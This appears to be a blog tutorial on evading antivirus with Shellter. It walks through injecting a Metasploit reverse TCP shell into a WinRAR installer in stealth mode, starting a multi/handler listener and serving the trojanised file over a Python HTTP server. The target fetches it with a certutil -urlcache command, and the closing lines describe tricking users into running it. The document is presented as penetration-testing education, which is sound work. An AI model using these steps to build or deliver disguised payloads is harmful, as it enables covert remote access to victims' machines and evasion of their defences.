Antivirus Evasion With Shellter
Attackers often find themselves trying to bypass antivirus controls when getting access to a system. As a security professional, you must understand these techniques in order to aid in offensive or defensive measures. I will be covering some of these techniques using a known tool by security professionals called Shellter.
Shellter is a dynamic shellcode injection tool that can be used to inject shellcode into native Windows applications (currently 32-bit apps only).
Tools needed for this walkthrough:
- Linux environment
- A target windows machine or VM
- Shellter tool
- Winrar download
- Metasploit
- The following commands should be run in order to install Shellter if you don't already have it deployed.
Since Shellter is designed to be run on Windows operating systems, we will also install wine a compatibility layer capable of running win32 applications on several POSIX-compliant operating systems.
sudo apt -y install wine
sudo apt -y install shellter2. Once everything is installed, running shellter in a terminal will provide us with a new console running under wine.
3. We need to now install an executable file we want to inject. For this example, we will download the famous WinRAR file archiver tool.
4. Now we revisit the Shellter interface running in the terminal. Shellter can run in either Auto or Manual mode. In Manual mode, the tool will launch the PE(Portable Executable)we want to use for injection and allow us to manipulate it on a more granular level. We can use this mode to highly customize the injection process in case the automatically selected options fail.
For the purposes of this example, we will run Shellter in Auto mode by selecting ‘A’ at the prompt.
5. For the PE target we need to put the full path of the file we want to inject. In this case, it was our downloads directory.
Before analyzing and altering the original PE in any way, Shellter will first create a backup of the file. This will take some time so grab a coffee as the process runs…
As soon as Shellter finds a suitable place to inject our payload, it will ask us if we want to enable Stealth Mode, which will attempt to restore the execution flow of the PE after our payload has been executed. Go ahead and type in ‘Y’ in the prompt for yes.
At this point, we are presented with the list of available payloads. These include popular selections such as meterpreter but Shellter also supports custom payloads. Type in ‘L’ in the first prompt for a listed payload and then continue with option ‘1’.
For our payload we need to give it our local machines IP address along with a port we want to listen on.
6. With all parameters set, Shellter will inject the payload into the WinRAR installer and attempt to reach the first instruction of the payload. We now need to open a listener on metasploit to grab the connection from the PE once it gets executed on the target machine.
Run the following commands in another terminal window:
msfconsoleuse exploit/multi/handlerset payload windows/shell/reverse_tcpset LHOST <Your IP here>set LPORT <Your chosen port here>run
once you run the handler it will start listening for any incoming connections on that IP and port.
Now we switch over to our target windows machine and grab the malicious PE file from our attacking machine. We will run a python SimpleHTTPServer on port 80 to serve the file.
On Attacking Machine in the same directory where malicious PE file is run the following command:
python -m SimpleHTTPServer 80
Switching over to the windows host we need to grab this file from the hosted attack machines python server.
Windows CMD command to grab the file from the attack machine:
certutil.exe -urlcache -split -f "http://<your ip here>:80/winrar-x32-611.exe"
The file is now on the Desktop and if executed it should connect back to our metapsloit listener with a shell to the target machine.
In a real-world scenario, an attacker would have to trick the user into downloading the malicious PE either via email or other means of communication hoping that the AV does not detect the file. Once they execute that file its a free game from there ;)
